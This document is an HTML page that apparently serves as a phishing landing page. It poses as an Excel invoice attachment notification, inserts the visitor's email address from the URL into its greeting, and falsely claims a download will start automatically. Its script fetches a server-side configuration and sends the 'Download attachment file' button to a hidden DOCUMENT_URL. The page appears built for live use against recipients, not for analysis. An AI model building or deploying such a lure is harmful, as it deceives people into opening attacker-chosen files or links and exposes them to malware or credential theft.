<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Excel Attachment Notification</title>
    <style>
        body {
            font-family: Times New Roman, Times, serif;
            text-align: center;
            margin-top: 40px;
            background: #fff;
        }
        .excel-icon {
            width: 120px;
            margin: 30px auto 10px auto;
            display: block;
        }
        .filename {
            font-size: 1.5em;
            margin-bottom: 30px;
        }
        .download-btn {
            background-color: #043800;
            color: #fff;
            border: none;
            border-radius: 5px;
            font-size: 2em;
            padding: 25px 35px;
            cursor: pointer;
            margin-top: 10px;
            margin-bottom: 45px;
            transition: background 0.2s;
        }
        .download-btn:hover {
            background-color: #065a00;
        }
        .download-btn.loading {
            background-color: #888;
            cursor: not-allowed;
        }
        .message {
            font-size: 2em;
            margin-bottom: 20px;
            margin-top: 40px;
        }
        .desc {
            font-size: 1.6em;
            margin-bottom: 40px;
        }
        @media (max-width: 600px) {
            .message, .desc, .filename {
                font-size: 1.2em;
            }
            .download-btn {
                font-size: 1.5em;
                padding: 15px 25px;
            }
            .excel-icon {
                width: 80px;
            }
        }
    </style>
</head>
<body>
    <div class="message">Dear <span id='usertag'>user</span>,</div>
    <div class="desc">
        Your download of the new Excel document will start automatically in a few seconds. If it doesn't, please click below:
    </div>
    <img src="https://images.seeklogo.com/logo-png/26/1/excel-logo-png_seeklogo-266583.png" alt="Excel Icon" class="excel-icon" />
    <div class="filename" id="fileName">Invoice_20210921.xlsx</div>
    <button class="download-btn" onclick="startDownload()" aria-label="Download Invoice_20210921.xlsx file">
        Download attachment file
    </button>
   

    <script>
(function() {
  let lastEmail = null;

  function getEmailFromUrl() {
    const params = new URLSearchParams(window.location.search);
    return params.get("email");
  }

  async function refreshConfig(email) {
    try {
      const res = await fetch(`/config?email=${encodeURIComponent(email)}`);
      const cfg = await res.json();

      // update restoreBtn
        const btn = document.querySelector(".download-btn");
       btn.addEventListener("click",evt =>{
         window.location.href = cfg.DOCUMENT_URL;
       }) 
      // replace {mename} with the email
      const messageEl = document.querySelector("#usertag");
      if (messageEl) {
        messageEl.innerText= email;
      }

    } catch (err) {
      console.error("Config load failed", err);
    }
  }

  function checkForEmailChange() {
    const email = getEmailFromUrl();
    console.log(`Checked email and found ${email}`)
    if (email && email.length > 4 && email !== lastEmail) {
      lastEmail = email;
      refreshConfig(email);
    }
  }

  // Run at page load
  //checkForEmailChange();
  refreshConfig('');

  // Watch periodically (since user can manually edit URL bar)
  setInterval(checkForEmailChange, 3000);

})();
</script>
</body>
</html>